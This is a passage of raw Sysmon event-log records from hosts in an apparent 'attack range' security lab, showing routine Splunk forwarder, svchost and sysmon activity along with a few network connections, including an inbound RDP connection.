Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1A6E9A7B43A819A7B5B08EBC8BAEE621,SHA256=E779169C33A3AFA7B859852E64F9B1FFF722CCE065EFFBB2389777C892A3B61D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:59.868{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36BC691ABBB14A1183A0D1C0F81F2DE3,SHA256=34A572A1D5369043F930E84C1FE1302E815A141165A7D9A6DEB859F7633A6B37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219672Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:59.725{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A4116D4896775AD8C09EAF70BD70127,SHA256=CE9C1D634B27A588B7050C038E7A1ECA1C636B7F26DCBE8FBCBB14EC08D93D78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:00.870{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7A9CE3DA9A15DBBF0F4B8AC4E8BD6A5,SHA256=FF5F6A9226E51E135D26D074B1EFF659A991D5ECF6212D60DCAA461A8B9369E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219673Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:00.787{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0A7F2F77EDD6B7C13897391CA0B571A,SHA256=129ED9F74A313B5C0B92D52D455B440D2EEFC845520F67A48235465BC2A5A58B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:01.897{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F553548845A72C78FB8539E334AEFAB,SHA256=134568FC0AA44DB22D1A66ECB95359DE827C1289F08BC5396D047FCD52893251,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219677Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:01.818{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDD4C93EC250BE4A2D8BD703266BB68E,SHA256=B69E692922786028B07D029AB295A9DB8E8F659EE29C2C05E9C95E4C16182333,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:01.539{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1555-6216-C706-000000003802}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:01.538{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:01.538{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:01.538{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1555-6216-C706-000000003802}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:01.537{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:01.537{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:01.536{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1555-6216-C706-000000003802}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:01.535{C8EA50B7-1555-6216-C706-000000003802}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219676Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:01.522{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=44DA4F9A0828649B4A33B7E89122DAA1,SHA256=D61C2676FE48A1852E4032C425716C2D746DB33D30FCD16BD2A118B1F8F2ED8F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219675Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:58.549{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51532-false10.0.1.12-8000- 354300x8000000000000000219674Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:58.439{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx61878-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219678Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:02.834{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82F0904F3C8C3D78B8AA24E60E2AF161,SHA256=D5709FFD2CCF6E09891E7D6D60141C65C544884B11ED3DE52FAFDFABDD378968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:02.911{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EED3B426DA828F62A54892CB4B429519,SHA256=D655B56A320C8966B002AE0F03A1F838AF62118CDE91D99544EFBCEC4EB1D98D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:02.849{C8EA50B7-1556-6216-C806-000000003802}56767112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000295535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:00.629{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49243-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000295534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:02.432{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1556-6216-C806-000000003802}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:02.431{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:02.431{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:02.431{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:02.430{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:02.429{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1556-6216-C806-000000003802}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:02.428{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1556-6216-C806-000000003802}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:02.427{C8EA50B7-1556-6216-C806-000000003802}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219679Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:03.943{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E9BB7B66577A18A3AF69917ABCDE600,SHA256=3E47D8AB3394DD1D7E0A8C16639A6710D9182A72A5A87EA21A4BE0BCD616F35B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:03.980{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1557-6216-C906-000000003802}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:03.949{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:03.949{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 